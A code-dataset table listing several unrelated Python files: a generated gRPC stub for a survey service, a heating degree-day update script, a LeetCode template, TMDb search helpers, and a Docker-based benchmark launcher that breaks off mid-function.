max_stars_repo_path
stringlengths 4
305
| max_stars_repo_name
stringlengths 4
130
| max_stars_count
int64 0
191k
| id
stringlengths 1
8
| content
stringlengths 6
1.02M
| score
float64 -1.16
4.16
| int_score
int64 0
4
|
---|---|---|---|---|---|---|
ondewo/survey/survey_pb2_grpc.py | ondewo/ondewo-survey-client-python | 0 | 12797208 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from ondewo.survey import survey_pb2 as ondewo_dot_survey_dot_survey__pb2
class SurveysStub(object):
    """Client-side stub for the ondewo.survey.Surveys gRPC service.

    ///// Services ///////

    One unary-unary callable is created per RPC defined in survey.proto.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.CreateSurvey = channel.unary_unary(
                '/ondewo.survey.Surveys/CreateSurvey',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.CreateSurveyRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
                )
        self.GetSurvey = channel.unary_unary(
                '/ondewo.survey.Surveys/GetSurvey',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
                )
        self.UpdateSurvey = channel.unary_unary(
                '/ondewo.survey.Surveys/UpdateSurvey',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.UpdateSurveyRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
                )
        self.DeleteSurvey = channel.unary_unary(
                '/ondewo.survey.Surveys/DeleteSurvey',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.DeleteSurveyRequest.SerializeToString,
                response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
                )
        self.ListSurveys = channel.unary_unary(
                '/ondewo.survey.Surveys/ListSurveys',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysResponse.FromString,
                )
        self.GetSurveyAnswers = channel.unary_unary(
                '/ondewo.survey.Surveys/GetSurveyAnswers',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyAnswersRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
                )
        self.GetAllSurveyAnswers = channel.unary_unary(
                '/ondewo.survey.Surveys/GetAllSurveyAnswers',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.GetAllSurveyAnswersRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
                )
        self.CreateAgentSurvey = channel.unary_unary(
                '/ondewo.survey.Surveys/CreateAgentSurvey',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
                )
        self.UpdateAgentSurvey = channel.unary_unary(
                '/ondewo.survey.Surveys/UpdateAgentSurvey',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
                response_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
                )
        self.DeleteAgentSurvey = channel.unary_unary(
                '/ondewo.survey.Surveys/DeleteAgentSurvey',
                request_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
                response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
                )
class SurveysServicer(object):
    """Server-side service interface for ondewo.survey.Surveys.

    ///// Services ///////

    Subclass and override the methods below; each default handler
    answers with grpc.StatusCode.UNIMPLEMENTED.
    """

    def CreateSurvey(self, request, context):
        """Create a Survey and an empty NLU Agent for it
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetSurvey(self, request, context):
        """Retrieve a Survey message from the Database and return it
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UpdateSurvey(self, request, context):
        """Update an existing Survey message from the Database and return it
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteSurvey(self, request, context):
        """Delete a survey and its associated agent (if existent)
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListSurveys(self, request, context):
        """Returns the list of all surveys in the server
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetSurveyAnswers(self, request, context):
        """Retrieve answers to survey questions collected in interactions with a survey agent for a specific session
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetAllSurveyAnswers(self, request, context):
        """Retrieve all answers to survey questions collected in interactions with a survey agent in any session
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CreateAgentSurvey(self, request, context):
        """Populate and configures an NLU Agent from a Survey
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UpdateAgentSurvey(self, request, context):
        """Update an NLU agent from a survey
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteAgentSurvey(self, request, context):
        """Deletes all data of an NLU agent associated to a survey
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_SurveysServicer_to_server(servicer, server):
    """Register the RPC handlers of `servicer` on a grpc.Server."""
    rpc_method_handlers = {
            'CreateSurvey': grpc.unary_unary_rpc_method_handler(
                    servicer.CreateSurvey,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.CreateSurveyRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.Survey.SerializeToString,
            ),
            'GetSurvey': grpc.unary_unary_rpc_method_handler(
                    servicer.GetSurvey,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.Survey.SerializeToString,
            ),
            'UpdateSurvey': grpc.unary_unary_rpc_method_handler(
                    servicer.UpdateSurvey,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.UpdateSurveyRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.Survey.SerializeToString,
            ),
            'DeleteSurvey': grpc.unary_unary_rpc_method_handler(
                    servicer.DeleteSurvey,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.DeleteSurveyRequest.FromString,
                    response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
            ),
            'ListSurveys': grpc.unary_unary_rpc_method_handler(
                    servicer.ListSurveys,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysResponse.SerializeToString,
            ),
            'GetSurveyAnswers': grpc.unary_unary_rpc_method_handler(
                    servicer.GetSurveyAnswers,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyAnswersRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.SerializeToString,
            ),
            'GetAllSurveyAnswers': grpc.unary_unary_rpc_method_handler(
                    servicer.GetAllSurveyAnswers,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.GetAllSurveyAnswersRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.SerializeToString,
            ),
            'CreateAgentSurvey': grpc.unary_unary_rpc_method_handler(
                    servicer.CreateAgentSurvey,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.SerializeToString,
            ),
            'UpdateAgentSurvey': grpc.unary_unary_rpc_method_handler(
                    servicer.UpdateAgentSurvey,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.FromString,
                    response_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.SerializeToString,
            ),
            'DeleteAgentSurvey': grpc.unary_unary_rpc_method_handler(
                    servicer.DeleteAgentSurvey,
                    request_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.FromString,
                    response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'ondewo.survey.Surveys', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Surveys(object):
    """Connectionless client API for ondewo.survey.Surveys.

    ///// Services ///////

    Each static method opens a channel to `target` per call via the
    EXPERIMENTAL grpc.experimental.unary_unary API.
    """

    @staticmethod
    def CreateSurvey(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/CreateSurvey',
            ondewo_dot_survey_dot_survey__pb2.CreateSurveyRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetSurvey(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/GetSurvey',
            ondewo_dot_survey_dot_survey__pb2.GetSurveyRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def UpdateSurvey(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/UpdateSurvey',
            ondewo_dot_survey_dot_survey__pb2.UpdateSurveyRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def DeleteSurvey(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/DeleteSurvey',
            ondewo_dot_survey_dot_survey__pb2.DeleteSurveyRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def ListSurveys(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/ListSurveys',
            ondewo_dot_survey_dot_survey__pb2.ListSurveysRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.ListSurveysResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetSurveyAnswers(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/GetSurveyAnswers',
            ondewo_dot_survey_dot_survey__pb2.GetSurveyAnswersRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetAllSurveyAnswers(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/GetAllSurveyAnswers',
            ondewo_dot_survey_dot_survey__pb2.GetAllSurveyAnswersRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def CreateAgentSurvey(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/CreateAgentSurvey',
            ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def UpdateAgentSurvey(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/UpdateAgentSurvey',
            ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
            ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def DeleteAgentSurvey(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/DeleteAgentSurvey',
            ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 1.03125 | 1 |
update_dd.py | alanmitchell/update-degree-days | 0 | 12797216 | <reponame>alanmitchell/update-degree-days<gh_stars>0
#!/usr/local/bin/python3.6
"""Script that adds monthly heating degree day values to a pickled
Pandas DataFrame with the path 'data/degree_days.pkl' (compression = 'bz2').
It also saves the DataFrame as a CSV file at 'data/degree_days.csv'. The
new degree-day information comes from the AHFC BMON site, https://bms.ahfc.us .
This script is typically run from a Cron job that schedules the script to
run on the first day of the month so that the prior month's degree days will
be available. Don't run the script late in the month or a partial month
may be prematurely added to the DataFrame because it satisfies the
MIN_COVERAGE check described below.
This script assumes the pickled DataFrame already exists and has the
following format:
month hdd60 hdd65
station
PAED 2018-02-01 1257.648675 1397.648675
PAED 2018-03-01 1028.027773 1183.027773
The index is the National Weather Service 4-letter station code. The
'month' column is a first-of-the-month date identifying the month whose
degree-days are shown. 'hdd60' and 'hdd65' are the heating degree-day
values: the first is base 60 degree F values and the second is base 65
deg F values.
This script will acquire temperature data from the AHFC BMON site in order
to calculate the degree-days for the most recent months not already
present in the DataFrame. All stations found in the index of the DataFrame
will be updated. The script assumes that the BMON sensor ID for a
weather station's temperature data is the 4-letter station code with '_temp'
appended, e.g. 'PAMR_temp'.
The MIN_COVERAGE constant in the script controls the minimum amount of data
coverage a month must have before being included. Missing data is filled
in with the average value for the rest of the hours that do have data.
-----------------------------------
NOTES ON UTILIZING THE DATA
To read this DataFrame back into a Python script, you can excecute the
following if the DataFrame is available on a local drive:
import pandas as pd
df = pd.read_pickle('degree_days.pkl', compression='bz2')
If the file is located on a web server, you can read it with the following
code:
import pandas as pd
import requests
from io import BytesIO
b = requests.get('http://ahfc.webfactional.com/data/degree_days.pkl').content
d = pd.read_pickle(BytesIO(b), compression='bz2')
Once you have a DataFrame, you can extract that portion of the DataFrame that
applies to one site by:
df_one_site = df.loc['PAMR']
or
df_one_site = df.query("station == 'PAMR'")
(slower than above technique)
To extract one site with a subset of the months:
df_one_site = df.query("station == 'PAMR' and month >= '2018-01-01'")
"""
from os.path import dirname, join, realpath
import sys
from datetime import datetime, timedelta
import pandas as pd
import requests
# Minimum fraction of the hours in a month that must have data in order
# to include the month.
MIN_COVERAGE = 0.7

print('\nScript Start: {}'.format(datetime.now().ctime()))

# path to this directory
APP_PATH = dirname(realpath(__file__))

# URL to the AHFC BMON site API; the '{}' is filled with a BMON sensor ID.
BMON_URL = 'https://bms.ahfc.us/api/v1/readings/{}/'
def dd_for_site(stn, start_date):
    """Returns a Pandas DataFrame of monthly heating degree-day values for
    'stn' (a NWS weather site code). Degree days start in the month that
    'start_date' (Python date/time object) falls in and continue through
    the end of available data. In the returned DataFrame, the index has a
    timestamp for each month returned, that being the first day of the
    month. The columns of the DataFrame are "hdd65" and "hdd60" to
    designate base 65 F degree-days and base 60 F degree-days.

    Temperature data used to calculate degree-days comes from the AHFC
    BMON site. Missing hours are assumed to not deviate from the average
    of the data present. The column 'coverage' indicates the fraction of
    the month's hours that actually have data.

    Raises:
        ValueError: if the BMON API reports a non-success status.
    """
    # get beginning of month
    st_dt_1 = start_date.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
    params = {
        'start_ts': st_dt_1.strftime('%Y-%m-%d'),
        'averaging': '1H'
    }
    # BMON sensor ID convention: NWS station code + '_temp', e.g. 'PAMR_temp'
    sensor_id = '{}_temp'.format(stn)
    resp = requests.get(BMON_URL.format(sensor_id), params=params).json()
    if resp['status']=='success':
        df = pd.DataFrame(resp['data']['readings'], columns=['ts', 'temp'])
        df.set_index('ts', inplace=True)
        df.index = pd.to_datetime(df.index)

        # calculate the percentage of each month that has data
        dfc = df.resample('1M').count()
        dfc['total_hours'] = [i.day * 24 for i in dfc.index]    # index is last day of the month
        dfc['coverage'] = dfc.temp / dfc.total_hours

        # Now back to the main dataframe to calc degree-days.
        # Each hourly reading contributes (base - temp) / 24 degree-days.
        df['hdd60'] = [(60.0 - x)/24.0 if x<60.0 else 0.0 for x in df.temp]
        df['hdd65'] = [(65.0 - x)/24.0 if x<65.0 else 0.0 for x in df.temp]
        df.drop(['temp'], axis=1, inplace=True)
        # Monthly mean * total hours fills missing hours with the month's
        # average hourly degree-day value.
        dfm = df.resample('1M').mean()
        dfm['coverage'] = dfc.coverage
        dfm['hdd60'] = dfm.hdd60 * dfc.total_hours
        dfm['hdd65'] = dfm.hdd65 * dfc.total_hours

        # Convert index timestamps to beginning of the month
        mos = [datetime(d.year, d.month, 1) for d in dfm.index]
        dfm.index = mos
        dfm.index.name = 'month'

    else:
        raise ValueError(str(resp['data']))

    return dfm
if __name__ == '__main__':

    # Existing degree-day DataFrame, indexed by NWS station code.
    df_exist = pd.read_pickle(join(APP_PATH, 'data/degree_days.pkl'), compression='bz2')

    # list of new DataFrames to add to the existing one
    new_dfs = []

    for stn in df_exist.index.unique():
        print('Processing {}: '.format(stn), end='')
        try:
            # get last month present for this station
            last_mo = df_exist.loc[stn].month.max()
            # get a date in the following month
            next_mo = last_mo + timedelta(days=32)  # could be a DST change in there; add 32 days to be safe
            # get degree days for missing months with adequate coverage
            df_new = dd_for_site(stn, next_mo).query('coverage > @MIN_COVERAGE').copy()
            if len(df_new):
                # put this DataFrame in a form that can be concatenated to the existing one
                df_new.reset_index(inplace=True)
                df_new.index = [stn] * len(df_new)
                df_new.index.name = 'station'
                df_new.drop(columns=['coverage'], inplace=True)
                # add it to the list of new DataFrames to eventually add to the
                # degree-day DataFrame
                new_dfs.append(df_new)
                print('{} new months'.format(len(df_new)))
            else:
                print()
        except Exception:
            # Best-effort per station: report the error and continue with the
            # next station. (Narrowed from a bare `except:`, which also
            # swallowed KeyboardInterrupt and SystemExit.)
            print('{}: {}'.format(*sys.exc_info()[:2]))

    # Create a new DataFrame that combines the existing data with the new.
    df_final = pd.concat([df_exist] + new_dfs)

    # get it sorted by station and month
    df_final.reset_index(inplace=True)
    df_final.sort_values(['station', 'month'], inplace=True)
    df_final.set_index('station', inplace=True)

    # Save the DataFrame as a compressed pickle and a CSV file.
    df_final.to_pickle(join(APP_PATH, 'data/degree_days.pkl'), compression='bz2', protocol=4)
    df_final.to_csv(join(APP_PATH, 'data/degree_days.csv'))
| 2.328125 | 2 |
easy/python3/c0050_204_count-primes/00_leetcode_0050.py | drunkwater/leetcode | 0 | 12797224 | <gh_stars>0
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#204. Count Primes
#Description:
#Count the number of prime numbers less than a non-negative number, n.
#Credits:
#Special thanks to @mithmatt for adding this problem and creating all test cases.
#class Solution:
# def countPrimes(self, n):
# """
# :type n: int
# :rtype: int
# """
# Time Is Money | 2.640625 | 3 |
app/search.py | S4G4R/tv-tracker | 0 | 12797232 | <gh_stars>0
import tmdbsimple as tmdb
def search_movie(title):
    """
    Connects to API to search for a specific movie by title.

    Args:
        title: Movie title string to query TMDb with.

    Returns:
        List of matching movie result dicts (empty if no matches).
    """
    search = tmdb.Search()
    # The call populates search.results as a side effect; the raw response
    # dict is not needed (previously bound to an unused local).
    search.movie(query=title)
    return search.results
def search_tv(title):
    """
    Connects to API to search for a specific tv show by title.

    Args:
        title: TV show title string to query TMDb with.

    Returns:
        List of matching TV result dicts (empty if no matches).
    """
    search = tmdb.Search()
    # The call populates search.results as a side effect; the raw response
    # dict is not needed (previously bound to an unused local).
    search.tv(query=title)
    return search.results
def search_by_id(id, type):
    """
    Connects to API to search for a specific movie or show by id.

    Args:
        id: TMDb identifier of the movie or TV show.
        type: 'tv' to look up a TV show; any other value is treated
            as a movie.

    Returns:
        Dict with the item's detail info from TMDb.
    """
    # NOTE: `id` and `type` shadow builtins, but the parameter names are
    # part of the existing public interface, so they are kept.
    if type == 'tv':
        result = tmdb.TV(id)
    else:
        result = tmdb.Movies(id)
    return result.info()
| 1.851563 | 2 |
benchmarks/launch_benchmark.py | s1113950/models | 0 | 12797240 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: EPL-2.0
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import signal
import subprocess
import sys
from argparse import ArgumentParser
from common import base_benchmark_util
class LaunchBenchmark(base_benchmark_util.BaseBenchmarkUtil):
    """Launches benchmarking job based on the specified args """

    def main(self):
        """Entry point: parse args, validate them, and run the container."""
        # parse_known_args returns (known, unknown); unknown args are ignored.
        args, unknown = self.parse_args(sys.argv[1:])
        try:
            self.validate_args(args)
        except (IOError, ValueError) as e:
            print("\nError: {}".format(e))
            sys.exit(1)
        self.run_docker_container(args)

    def parse_args(self, args):
        """Parse the common benchmark args plus the launch-script-only args."""
        super(LaunchBenchmark, self).define_args()

        # Additional args that are only used with the launch script
        arg_parser = ArgumentParser(
            parents=[self._common_arg_parser],
            description="Parse args for benchmark interface")

        arg_parser.add_argument(
            "--docker-image", help="Specify the docker image/tag to use",
            dest="docker_image", default=None, required=True)

        arg_parser.add_argument(
            "--debug", help="Launches debug mode which doesn't execute "
            "start.sh", action="store_true")

        return arg_parser.parse_known_args(args)

    def validate_args(self, args):
        """validate the args"""
        # validate the shared args first
        super(LaunchBenchmark, self).validate_args(args)

        # Check for spaces in docker image
        if ' ' in args.docker_image:
            raise ValueError("docker image string "
                             "should not have whitespace(s)")

        # validate that we support this framework by checking folder names
        benchmark_dir = os.path.dirname(os.path.realpath(__file__))
        if glob.glob("{}/*/{}".format(benchmark_dir, args.framework)) == []:
            raise ValueError("The specified framework is not supported: {}".
                             format(args.framework))

        # if neither benchmark_only or accuracy_only are specified, then enable
        # benchmark_only as the default
        if not args.benchmark_only and not args.accuracy_only:
            args.benchmark_only = True

    def run_docker_container(self, args):
        """
        Runs a docker container with the specified image and environment
        variables to start running the benchmarking job.
        """
        benchmark_scripts = os.path.dirname(os.path.realpath(__file__))
        intelai_models = os.path.join(benchmark_scripts, os.pardir, "models")
        if args.model_name:
            # find the path to the model's benchmarks folder
            search_path = os.path.join(
                benchmark_scripts, "*", args.framework, args.model_name,
                args.mode, args.precision)
            matches = glob.glob(search_path)
            if len(matches) > 1:
                # we should never get more than one match
                raise ValueError("Found multiple model locations for {} {} {}"
                                 .format(args.framework,
                                         args.model_name,
                                         args.precision))
            elif len(matches) == 0:
                raise ValueError("No model was found for {} {} {}"
                                 .format(args.framework,
                                         args.model_name,
                                         args.precision))

            # use the benchmarks directory path to find the use case
            dir_list = matches[0].split("/")

            # find the last occurrence of framework in the list
            framework_index = len(dir_list) - 1 - dir_list[::-1].index(
                args.framework)

            # grab the use case name from the path
            use_case = str(dir_list[framework_index - 1])

            # find the intelai_optimized model directory
            optimized_model_dir = os.path.join(
                benchmark_scripts, os.pardir, "models", use_case,
                args.framework, args.model_name)

            # if we find an optimized model, then we will use that path
            if os.path.isdir(intelai_models):
                intelai_models = optimized_model_dir

        # Container-side mount points for the host directories below.
        mount_benchmark = "/workspace/benchmarks"
        mount_external_models_source = "/workspace/models"
        mount_intelai_models = "/workspace/intelai_models"
        workspace = os.path.join(mount_benchmark, "common", args.framework)

        mount_output_dir = False
        output_dir = os.path.join(workspace, 'logs')
        if args.output_dir != "/models/benchmarks/common/tensorflow/logs":
            # we don't need to mount log dir otherwise since default is workspace folder
            mount_output_dir = True
            output_dir = args.output_dir

        in_graph_dir = os.path.dirname(args.input_graph) if args.input_graph \
            else ""
        in_graph_filename = os.path.basename(args.input_graph) if \
            args.input_graph else ""

        # NOTE(review): `use_case` is only assigned inside the
        # `if args.model_name:` branch above, but is referenced below —
        # presumably model_name is always set by this point; confirm.
        env_vars = ["--env", "DATASET_LOCATION_VOL={}".format(args.data_location),
                    "--env", "CHECKPOINT_DIRECTORY_VOL={}".format(args.checkpoint),
                    "--env", "EXTERNAL_MODELS_SOURCE_DIRECTORY={}".format(args.model_source_dir),
                    "--env", "INTELAI_MODELS={}".format(intelai_models),
                    "--env", "BENCHMARK_SCRIPTS={}".format(benchmark_scripts),
                    "--env", "SOCKET_ID={}".format(args.socket_id),
                    "--env", "MODEL_NAME={}".format(args.model_name),
                    "--env", "MODE={}".format(args.mode),
                    "--env", "PRECISION={}".format(args.precision),
                    "--env", "VERBOSE={}".format(args.verbose),
                    "--env", "BATCH_SIZE={}".format(args.batch_size),
                    "--env", "WORKSPACE={}".format(workspace),
                    "--env", "IN_GRAPH=/in_graph/{}".format(in_graph_filename),
                    "--env", "MOUNT_BENCHMARK={}".format(mount_benchmark),
                    "--env", "MOUNT_EXTERNAL_MODELS_SOURCE={}".format(mount_external_models_source),
                    "--env", "MOUNT_INTELAI_MODELS_SOURCE={}".format(mount_intelai_models),
                    "--env", "USE_CASE={}".format(use_case),
                    "--env", "FRAMEWORK={}".format(args.framework),
                    "--env", "NUM_CORES={}".format(args.num_cores),
                    "--env", "NUM_INTER_THREADS={}".format(args.num_inter_threads),
                    "--env", "NUM_INTRA_THREADS={}".format(args.num_intra_threads),
                    "--env", "DATASET_LOCATION=/dataset",
                    "--env", "CHECKPOINT_DIRECTORY=/checkpoints",
                    "--env", "BENCHMARK_ONLY={}".format(args.benchmark_only),
                    "--env", "ACCURACY_ONLY={}".format(args.accuracy_only),
                    "--env", "OUTPUT_RESULTS={}".format(args.output_results),
                    "--env", "NOINSTALL=False",
                    "--env", "OUTPUT_DIR={}".format(output_dir)]

        # by default we will install, user needs to set NOINSTALL=True
        # manually after they get into `--debug` mode
        # since they need to run one time without this flag
        # to get stuff installed

        # Add custom model args as env vars
        for custom_arg in args.model_args:
            if "=" not in custom_arg:
                raise ValueError("Expected model args in the format "
                                 "`name=value` but received: {}".
                                 format(custom_arg))
            env_vars.append("--env")
            env_vars.append("{}".format(custom_arg))

        # Add proxy to env variables if any set on host
        for environment_proxy_setting in [
            "http_proxy",
            "ftp_proxy",
            "https_proxy",
            "no_proxy",
        ]:
            if not os.environ.get(environment_proxy_setting):
                continue
            env_vars.append("--env")
            env_vars.append("{}={}".format(
                environment_proxy_setting,
                os.environ.get(environment_proxy_setting)
            ))

        volume_mounts = ["--volume", "{}:{}".format(benchmark_scripts, mount_benchmark),
                         "--volume", "{}:{}".format(args.model_source_dir, mount_external_models_source),
                         "--volume", "{}:{}".format(intelai_models, mount_intelai_models),
                         "--volume", "{}:/dataset".format(args.data_location),
                         "--volume", "{}:/checkpoints".format(args.checkpoint),
                         "--volume", "{}:/in_graph".format(in_graph_dir)]

        if mount_output_dir:
            volume_mounts.extend([
                "--volume", "{}:{}".format(output_dir, output_dir)])

        docker_run_cmd = ["docker", "run"]

        # only use -it when debugging, otherwise we might get TTY error
        if args.debug:
            docker_run_cmd.append("-it")

        docker_run_cmd = docker_run_cmd + env_vars + volume_mounts + [
            "--privileged", "-u", "root:root", "-w",
            workspace, args.docker_image, "/bin/bash"]

        if not args.debug:
